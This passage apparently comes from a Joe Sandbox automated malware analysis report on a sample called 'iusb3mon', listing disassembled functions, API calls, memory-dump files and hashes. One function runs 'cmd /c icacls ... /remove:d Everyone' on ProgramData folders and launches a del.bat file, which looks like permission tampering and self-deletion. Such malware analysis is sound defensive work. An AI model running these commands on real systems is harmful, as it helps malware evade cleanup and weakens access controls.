                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                    • String ID: string too long
                                                                                                                    • API String ID: 1846318660-2556327735
                                                                                                                    • Opcode ID: 6ade90d0c696962b5eaee50054e57ee68a0ad2cbdb8b5e3b28950e57b8b4c868
                                                                                                                    • Instruction ID: b8e06fe1ba4a1713804bc0ed339d0513ed39e722ad8aef25db5951964c2c6438
                                                                                                                    • Opcode Fuzzy Hash: 6ade90d0c696962b5eaee50054e57ee68a0ad2cbdb8b5e3b28950e57b8b4c868
                                                                                                                    • Instruction Fuzzy Hash: 80E0C272A2075A97C610EFD9EC01886B7DCDE26B507108627F788F7700FBB0A58087A5
                                                                                                                    Function 06243FAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06243E0C
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06243E14
                                                                                                                      • Part of subcall function 06243DF2: DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E1B
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(c:\del,?,?), ref: 06243E38
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 06243E4B
                                                                                                                      • Part of subcall function 06243DF2: WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 06243E53
                                                                                                                      • Part of subcall function 06243DF2: Sleep.KERNEL32(000003E8,?,?), ref: 06243E5A
                                                                                                                      • Part of subcall function 06243DF2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 06243E6A
                                                                                                                      • Part of subcall function 06243DF2: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 06243E83
                                                                                                                      • Part of subcall function 06243DF2: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 06243E9A
                                                                                                                    • WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 06243FBA
                                                                                                                    • ExitProcess.KERNEL32 ref: 06243FC2
                                                                                                                    Strings
                                                                                                                    • cmd /c echo.>c:\del & exit, xrefs: 06243FB5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exec$Sleep$FileName$DeleteEnvironmentExitModulePathProcessShortVariable
                                                                                                                    • String ID: cmd /c echo.>c:\del & exit
                                                                                                                    • API String ID: 253100718-3921158289
                                                                                                                    • Opcode ID: 762dad9051cdcebd67e881bc1af099209fd42057805143eebe6c8ebf5e886db2
                                                                                                                    • Instruction ID: be93bcdd3052b74c446ad339009a6ad287e49f4e3c64cdc4e0ae4f79b90b893d
                                                                                                                    • Opcode Fuzzy Hash: 762dad9051cdcebd67e881bc1af099209fd42057805143eebe6c8ebf5e886db2
                                                                                                                    • Instruction Fuzzy Hash: 52B012302B0302E7D2E43FB1BC4FF183A11A710B02F019400F74AD84C8CEB001404F12
                                                                                                                    Function 0624F4EE Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0624F2B6,00000000,00000000,00000000,0624AD29,00000000,00000000,06248D56,00000000,00000000,00000000), ref: 0624F516
                                                                                                                    • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0624F2B6,00000000,00000000,00000000,0624AD29,00000000,00000000,06248D56,00000000,00000000,00000000), ref: 0624F54A
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0624F564
                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 0624F57B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap$FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3499195154-0
                                                                                                                    • Opcode ID: 66e8b6c17f26f5c0dffd61821ecf982c741a32bbd2830add276ad9fb7a7c637f
                                                                                                                    • Instruction ID: 0f75f6a5e319bfaa61ec2aa7d645a24a80adbd33cc0119fb5929d71e5ebef723
                                                                                                                    • Opcode Fuzzy Hash: 66e8b6c17f26f5c0dffd61821ecf982c741a32bbd2830add276ad9fb7a7c637f
                                                                                                                    • Instruction Fuzzy Hash: 18114370600302AFD7609F18F94CD267BB7FB847207104A29E692D29E8C774A986CF01
                                                                                                                    Function 0625C9FF Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(06276740,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA3A
                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA4C
                                                                                                                    • LeaveCriticalSection.KERNEL32(06276740,?,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA), ref: 0625CA55
                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA,00000100), ref: 0625CA67
                                                                                                                      • Part of subcall function 0625C9BA: GetVersion.KERNEL32(?,0625CA0F,?,0625C8E5,00000010,?,00000100,?,?,?,0625C4A4,0625C4EB,0625C4D2,062587DA,00000100,06258773), ref: 0625C9CD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Enter$InitializeLeaveVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1193629340-0
                                                                                                                    • Opcode ID: 2455ea9e2a656befc0eff05770a6fbae8935ca247918015c8f21fe99d1347627
                                                                                                                    • Instruction ID: 6c2c63d96ee698f394d727ad76f94231ce84c0ea178a13e9fc7b440e5881dc98
                                                                                                                    • Opcode Fuzzy Hash: 2455ea9e2a656befc0eff05770a6fbae8935ca247918015c8f21fe99d1347627
                                                                                                                    • Instruction Fuzzy Hash: 42F08C7151171BDFCB60EF54F888D92B7AAFB05316B42403ADB5592005E730E549CE91
                                                                                                                    Function 0624CF5F Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(?,0624CD22,?,0624B623), ref: 0624CF6C
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF74
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF7C
                                                                                                                    • InitializeCriticalSection.KERNEL32 ref: 0624CF84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 32694325-0
                                                                                                                    • Opcode ID: fe8fc0bf6d54bf476c70d6d14ab10138073bf95e658da54651f1a0ac4c394c27
                                                                                                                    • Instruction ID: a8edb26bb7b5a0ce0044732bd5654cc824c8c6f1063d2a2df3ccef037ea9b97e
                                                                                                                    • Opcode Fuzzy Hash: fe8fc0bf6d54bf476c70d6d14ab10138073bf95e658da54651f1a0ac4c394c27
                                                                                                                    • Instruction Fuzzy Hash: 6FC0E93580A3789ACB512B55FD4C8493F67EF042A4312C072F6845907186211D11DF91